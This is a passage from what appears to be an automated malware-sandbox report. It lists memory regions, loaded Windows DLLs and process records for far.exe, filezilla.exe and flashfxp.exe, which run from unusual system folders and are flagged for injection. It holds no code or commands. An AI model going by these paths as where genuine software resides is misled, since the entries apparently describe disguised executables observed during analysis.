end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1815 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1816 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1817 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1818 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1819 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1820 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1821 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1822 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1823 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1824 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1825 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1826 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1827 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1828 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1829 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1830 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1831 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1832 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1833 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 1835 start_va = 0x5f0000 end_va = 0x6c9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Thread: id = 97 os_tid = 0xc5c Thread: id = 98 os_tid = 0xc24 Process: id = "15" image_name = "far.exe" filename = "c:\\program files\\windows portable devices\\far.exe" page_root = "0x56a61000" os_pid = "0xba4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\far.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1836 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1837 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1838 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1839 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1840 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1841 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1842 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1843 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1844 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1845 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1846 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1847 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1848 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1849 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1850 start_va = 0x450000 end_va = 0x50dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1851 start_va = 0x510000 end_va = 0x5cbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1852 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1853 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1854 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 1855 start_va = 0x980000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 1856 start_va = 0xbd0000 end_va = 0xbe6fff monitored = 0 entry_point = 0xbd14a1 region_type = mapped_file name = "far.exe" filename = "\\Program Files\\Windows Portable Devices\\far.exe" (normalized: "c:\\program files\\windows portable devices\\far.exe") Region: id = 1857 start_va = 0xbf0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 1858 start_va = 0x1ff0000 end_va = 0x29b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ff0000" filename = "" Region: id = 1859 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1860 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1861 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1862 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1863 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1864 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1865 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1866 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1867 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1868 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1869 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1870 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1871 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1872 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1873 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1874 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1875 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1876 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1877 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1878 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1879 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1880 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1881 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1882 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1883 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1884 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 1886 start_va = 0x29c0000 end_va = 0x2b67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029c0000" filename = "" Thread: id = 99 os_tid = 0x9c8 Thread: id = 100 os_tid = 0xb9c Process: id = "16" image_name = "filezilla.exe" filename = "c:\\program files\\windowspowershell\\filezilla.exe" page_root = "0x5866b000" os_pid = "0xadc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\WindowsPowerShell\\filezilla.exe\" " cur_dir = "C:\\Program Files\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1887 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1888 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1889 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1890 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1891 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1892 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1893 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1894 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1895 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1896 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1897 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1898 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1899 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1900 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1901 start_va = 0x5c0000 end_va = 0x67bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1902 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1903 start_va = 0x8b0000 end_va = 0xa37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1904 start_va = 0xa40000 end_va = 0xbc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 1905 start_va = 0xcc0000 end_va = 0xcd6fff monitored = 0 entry_point = 0xcc14a1 region_type = mapped_file name = "filezilla.exe" filename = "\\Program Files\\WindowsPowerShell\\filezilla.exe" (normalized: "c:\\program files\\windowspowershell\\filezilla.exe") Region: id = 1906 start_va = 0xce0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 1907 start_va = 0x2210000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 1908 start_va = 0x23d0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 1909 start_va = 0x23e0000 end_va = 0x2da3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023e0000" filename = "" Region: id = 1910 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1911 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1912 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1913 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1914 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1915 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1916 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1917 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1918 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1919 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1920 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1921 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1922 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1923 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1924 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1925 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1926 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1927 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1928 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1929 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1930 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1931 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1932 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1933 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1934 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1935 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 1938 start_va = 0x2220000 end_va = 0x2364fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002220000" filename = "" Thread: id = 101 os_tid = 0x8c4 Thread: id = 102 os_tid = 0xda8 Process: id = "17" image_name = "flashfxp.exe" filename = "c:\\program files\\msbuild\\flashfxp.exe" page_root = "0x56e75000" os_pid = "0x68c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\MSBuild\\flashfxp.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1939 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1940 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1941 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1942 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1943 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1944 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1945 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1946 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1947 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1948 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1949 start_va = 0x220000 end_va = 0x223fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1950 start_va = 0x260000 end_va = 0x35ffff 